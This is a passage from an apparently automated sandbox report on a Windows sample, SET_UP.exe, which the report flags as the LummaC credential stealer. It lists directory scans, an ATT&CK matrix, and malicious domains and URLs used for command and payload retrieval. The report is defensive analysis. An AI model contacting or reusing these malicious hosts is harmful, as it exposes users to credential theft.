              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		221
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		211
              Security Software Discovery              		Remote Services41
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager221
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials32
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
              skinfuzzerz.cyou0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/K0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/c0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/A0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/Y0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/RN0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/88q0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtxe100%Avira URL Cloudmalware
              https://dfgh.onlin0%Avira URL Cloudsafe
              https://klipvumisui.shop/_B100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtf1100%Avira URL Cloudmalware
              https://klipvumisui.shop/Fi100%Avira URL Cloudmalware
              https://skinfuzzerz.cyou/s0%Avira URL Cloudsafe
              https://skinfuzzerz.cyou/api0%Avira URL Cloudsafe
              https://dfgh.online/100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txter100%Avira URL Cloudmalware
              https://skinfuzzerz.cyou:443/api0%Avira URL Cloudsafe
              https://klipvumisui.shop/;100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                skinfuzzerz.cyou
                		188.114.97.3
                		truetrue
                  		unknown
                  241.42.69.40.in-addr.arpa
                  		unknown
                  		unknownfalse
                    		high
                    dfgh.online
                    		unknown
                    		unknownfalse
                      		high
                      klipvumisui.shop
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        skinfuzzerz.cyoutrue
                        • Avira URL Cloud: safe
                        		unknown
                        rabidcowse.shopfalse
                          		high
                          wholersorie.shopfalse
                            		high
                            https://skinfuzzerz.cyou/apitrue
                            • Avira URL Cloud: safe
                            		unknown
                            cloudewahsj.shopfalse
                              		high
                              noisycuttej.shopfalse
                                		high
                                nearycrepso.shopfalse
                                  		high
                                  https://cegu.shop/8574262446/ph.txtfalse
                                    		high
                                    framekgirus.shopfalse
                                      		high
                                      tirepublicerj.shopfalse
                                        		high
                                        abruptyopsn.shopfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://klipvumisui.shop:443/int_clp_sha.txtSET_UP.exe, 00000000.00000003.2032852919.0000000000947000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://skinfuzzerz.cyou/SET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977857592.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977322995.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1978395050.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976505025.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976948513.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1976169185.0000000000966000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946456682.0000000003676000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://skinfuzzerz.cyou/ASET_UP.exe, 00000000.00000003.1946540619.0000000003680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://klipvumisui.shop/int_clp_sha.txtxeSET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://skinfuzzerz.cyou/88qSET_UP.exe, 00000000.00000003.1957745990.0000000003687000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1958214464.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2003997079.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032739834.000000000368B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033008758.000000000368B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://skinfuzzerz.cyou/KSET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.2055826349.00000000030DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.starfieldtech.com/0DSET_UP.exefalse
                                                        		high
                                                        https://skinfuzzerz.cyou/RNSET_UP.exe, 00000000.00000003.1946741383.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1947405272.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0SET_UP.exefalse
                                                          		high
                                                          https://skinfuzzerz.cyou/YSET_UP.exe, 00000000.00000003.2004113254.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://skinfuzzerz.cyou/cSET_UP.exe, 00000000.00000003.1958611404.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1957838245.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://klipvumisui.shop/_BSET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://dfgh.onlinepowershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://klipvumisui.shop/int_clp_sha.txtf1SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://dfgh.onlinpowershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dfgh.online/invoker.php?compname=powershell.exe, 00000004.00000002.2056281293.0000000003447000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.starfieldtech.com/repository/sfsroot.crl0PSET_UP.exefalse
                                                                              		high
                                                                              https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2056872307.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://skinfuzzerz.cyou/sSET_UP.exe, 00000000.00000003.1975769207.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973906418.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://klipvumisui.shop/int_clp_sha.txtSET_UP.exe, SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035710169.0000000000951000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000950000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.000000000090D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.innosetup.com/SET_UP.exefalse
                                                                                      		high
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://go.micropowershell.exe, 00000004.00000002.2056872307.0000000005907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://klipvumisui.shop/FiSET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://ocsp.thawte.com0SET_UP.exefalse
                                                                                                  		high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2062550653.0000000006177000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://klipvumisui.shop/int_clp_sha.txterSET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1922330613.0000000003712000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946395569.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1922484124.00000000036C6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1946521144.00000000036C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://certificates.starfieldtech.com/repository/1604SET_UP.exefalse
                                                                                                              		high
                                                                                                              https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.symauth.com/cps0(SET_UP.exefalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1959447648.0000000003794000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://klipvumisui.shop/SET_UP.exe, SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://dfgh.online/SET_UP.exetrue
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://klipvumisui.shop/;SET_UP.exe, 00000000.00000003.2032439542.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035748954.0000000000963000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2033390701.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          http://crl.starfieldtech.com/repository/0SET_UP.exefalse
                                                                                                                            		high
                                                                                                                            http://www.symauth.com/rpa00SET_UP.exefalse
                                                                                                                              		high
                                                                                                                              https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000004.00000002.2056872307.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://skinfuzzerz.cyou:443/apiSET_UP.exe, 00000000.00000003.2004113254.000000000094F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://support.microsofSET_UP.exe, 00000000.00000003.1922330613.0000000003714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.remobjects.com/psSET_UP.exefalse
                                                                                                                                      		high
                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          188.114.97.3
                                                                                                                                          		skinfuzzerz.cyouEuropean Union
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          185.161.251.21
                                                                                                                                          		cegu.shopUnited Kingdom
                                                                                                                                          		5089NTLGBfalse

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1585349
                                                                                                                                          Start date and time:2025-01-07 14:47:09 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 4m 55s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:SET_UP.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/3@5/2
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 10
                                                                                                                                          • Number of non-executed functions: 7
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 40.69.42.241
                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target SET_UP.exe, PID 7268 because there are no executed function
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: SET_UP.exe

                                                                                                                                          Simulations

